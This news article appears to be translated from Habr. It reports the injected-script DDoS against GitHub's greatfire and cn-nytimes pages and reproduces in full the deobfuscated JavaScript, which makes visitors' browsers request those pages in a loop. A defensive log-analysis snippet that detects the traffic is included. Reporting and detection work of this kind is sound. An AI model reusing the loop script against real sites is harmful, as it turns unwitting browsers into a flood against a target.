
GitHub has been holding out against a DDoS attack for a second day

GitHub has been withstanding a continuous DDoS attack for more than 24 hours. The current status is reported periodically on Twitter at @GithubStatus and on the page https://status.github.com/.

The service is no longer available for some users. The last message on Twitter was posted two hours ago.

Apparently, the attack is of Chinese origin. There is evidence that a script is being injected into the HTTP packets served to some visitors of Baidu, the largest search engine in China; every two seconds it requests github.com/greatfire and github.com/cn-nytimes from GitHub.

The malicious script is hm.baidu.com/h.js. It should be empty, but after the HTTP injection it carries the content shown below.

Listing after deobfuscation
// Load jQuery, falling back to code.jquery.com if the first copy did not load
document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;

function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;

// Pick one of the two targets from the current second and request it
function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}

// Request the target as a cross-domain script with a 10-second timeout
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            // Keep rescheduling until 3E5 ms (5 minutes) after start; the delay is the last response time
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}

function r_send(a) {
    setTimeout("r_send2()", a)
}
// First request fires 2 seconds after the script loads
setTimeout("r_send2()", 2E3);
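
One way a site operator could spot this loop in web server access logs, as an added example that is not part of the original article: it flags clients that repeatedly GET the two targeted paths with an off-site Referer inside the script's five-minute run time. The log entry shape, the 10-hit threshold and the sample data are assumptions.

```javascript
// Targets come from url_array in the listing. `cache: true` means jQuery adds no
// cache-busting query string, so the request path matches exactly.
const TARGET_PATHS = ["/greatfire/", "/cn-nytimes/"];
const WINDOW_MS = 300000; // the script stops rescheduling 3E5 ms after it starts
const MIN_HITS = 10;      // assumed threshold; tune against real traffic

// By default a cross-domain script load carries the embedding page's URL as Referer.
function isCrossSite(referer) {
  try { return new URL(referer).hostname !== "github.com"; }
  catch (err) { return false; } // missing or malformed Referer is not counted
}

// entries: [{ ip, ts (ms), method, path, referer }] (assumed log shape)
function flagClients(entries) {
  const hits = new Map();
  for (const e of entries) {
    if (e.method !== "GET" || !TARGET_PATHS.includes(e.path)) continue;
    if (!isCrossSite(e.referer)) continue;
    if (!hits.has(e.ip)) hits.set(e.ip, []);
    hits.get(e.ip).push(e.ts);
  }
  const flagged = [];
  for (const [ip, times] of hits) {
    times.sort((a, b) => a - b);
    // Sliding window: MIN_HITS matching requests inside WINDOW_MS.
    for (let start = 0, end = 0; end < times.length; end++) {
      while (times[end] - times[start] > WINDOW_MS) start++;
      if (end - start + 1 >= MIN_HITS) { flagged.push(ip); break; }
    }
  }
  return flagged.sort();
}

// Constructed sample log: documentation-range IPs, example.* referers.
function sampleLog() {
  const t0 = 1000000000000, log = [];
  const add = (ip, ts, path, referer) => log.push({ ip, ts, method: "GET", path, referer });
  for (let i = 0; i < 12; i++) {
    // Looping client: one request every 3 s, alternating targets.
    add("192.0.2.10", t0 + i * 3000, TARGET_PATHS[i % 2], "http://news.example.com/story");
    // Same volume spread over nearly two hours: never reaches the threshold.
    add("198.51.100.7", t0 + i * 600000, "/greatfire/", "http://blog.example.net/links");
    // On-site navigation: Referer is github.com itself.
    add("203.0.113.5", t0 + i * 3000, "/greatfire/", "https://github.com/explore");
  }
  return log;
}

console.log(flagClients(sampleLog()));
```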

If this is indeed the case, the DDoS attack may be political in nature and possibly conducted with the participation of government agencies by means of deep traffic inspection. Perhaps the authorities are trying to hinder access to the software tools at the above addresses: VPNs and other programs for circumventing Chinese censorship.

As a result of the DDoS attack, all other GitHub users are affected as well.

By the way, a week ago the GreatFire administrators reported the start of a DDoS attack of approximately 2.6 billion requests per hour (approximately 2500 times higher than the usual level). The activists have to pay $30,000 per day for Amazon traffic.

Source: https://habr.com/ru/post/356702/

